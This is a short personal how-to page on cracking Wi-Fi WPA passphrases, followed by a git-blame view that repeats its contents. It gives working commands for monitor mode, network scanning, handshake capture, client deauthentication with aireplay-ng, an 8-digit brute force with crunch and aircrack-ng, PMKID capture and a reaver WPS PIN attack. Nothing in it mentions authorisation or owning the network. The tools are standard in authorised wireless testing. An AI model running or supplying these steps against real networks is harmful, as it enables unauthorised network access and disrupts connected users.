mkdocs-benoit.jp.net/docs/Howtos/HowtoCrackWPA.md

## Monitor mode
For my RTL8188EUS:

```console
# ip link set wlanX down
# iw dev wlanX set type monitor
```

## Scan networks

All channels:
```console
# airodump-ng wlanX
```
Specific channel:
```console
# airodump-ng -c 6 wlanX
```

## Save a capture of chosen BSSID

```console
# airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
```

You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
```console
# aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
```
`-a` is access point  
`-c` is client  

Then you should have an EAPOL/WPA handshake.

## Crack WPA passphrase

### For a 8 digits scheme

```console
$ crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
```

## Wireshark

PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>

## PMKID method

```console
$ hcxdumptool -i wlanX -o PMKID --enable_status=1
```

TODO...

## WPS method

AP must have WPS enabled with a PIN. Not PBC, push button.

```console
# reaver -i wlanX -b 00:23:B1:82:84:xx
```

## Resources

<https://github.com/ZerBea/hcxdumptool>  
<https://github.com/ZerBea/hcxtools>  
<https://wpa-sec.stanev.org/>
Update sections title 2021-02-20 05:36:21 +00:00			`## Monitor mode`
init 2020-10-27 06:39:08 +00:00			`For my RTL8188EUS:`

Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`# ip link set wlanX down`
			`# iw dev wlanX set type monitor`
init 2020-10-27 06:39:08 +00:00			```

Update sections title 2021-02-20 05:36:21 +00:00			`## Scan networks`
init 2020-10-27 06:39:08 +00:00
			`All channels:`
Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`# airodump-ng wlanX`
init 2020-10-27 06:39:08 +00:00			```
			`Specific channel:`
Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`# airodump-ng -c 6 wlanX`
init 2020-10-27 06:39:08 +00:00			```

Update sections title 2021-02-20 05:36:21 +00:00			`## Save a capture of chosen BSSID`
init 2020-10-27 06:39:08 +00:00
Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`# airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX`
init 2020-10-27 06:39:08 +00:00			```

			`You need to wait for a client to connect, or to deauth it and get the 4-way handshake.`
Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`# aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX`
init 2020-10-27 06:39:08 +00:00			```
			`-a` is access point
			`-c` is client

			`Then you should have an EAPOL/WPA handshake.`

Update sections title 2021-02-20 05:36:21 +00:00			`## Crack WPA passphrase`
init 2020-10-27 06:39:08 +00:00
Update sections title 2021-02-20 05:36:21 +00:00			`### For a 8 digits scheme`
init 2020-10-27 06:39:08 +00:00
Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`$ crunch 8 8 0123456789 -s 00000000 \| aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap`
PSK Generator 2020-10-27 07:09:00 +00:00			```

Update sections title 2021-02-20 05:36:21 +00:00			`## Wireshark`
PSK Generator 2020-10-27 07:09:00 +00:00
WPS method 2020-10-27 11:53:19 +00:00			`PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>`

			`## PMKID method`

Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`$ hcxdumptool -i wlanX -o PMKID --enable_status=1`
WPS method 2020-10-27 11:53:19 +00:00			```

			`TODO...`

			`## WPS method`

			`AP must have WPS enabled with a PIN. Not PBC, push button.`

Update all code blocks 2021-02-20 06:06:15 +00:00			```console
			`# reaver -i wlanX -b 00:23:B1:82:84:xx`
Add some links 2020-10-27 23:48:30 +00:00			```

			`## Resources`

			`<https://github.com/ZerBea/hcxdumptool>`
			`<https://github.com/ZerBea/hcxtools>`
Update sections title 2021-02-20 05:36:21 +00:00			`<https://wpa-sec.stanev.org/>`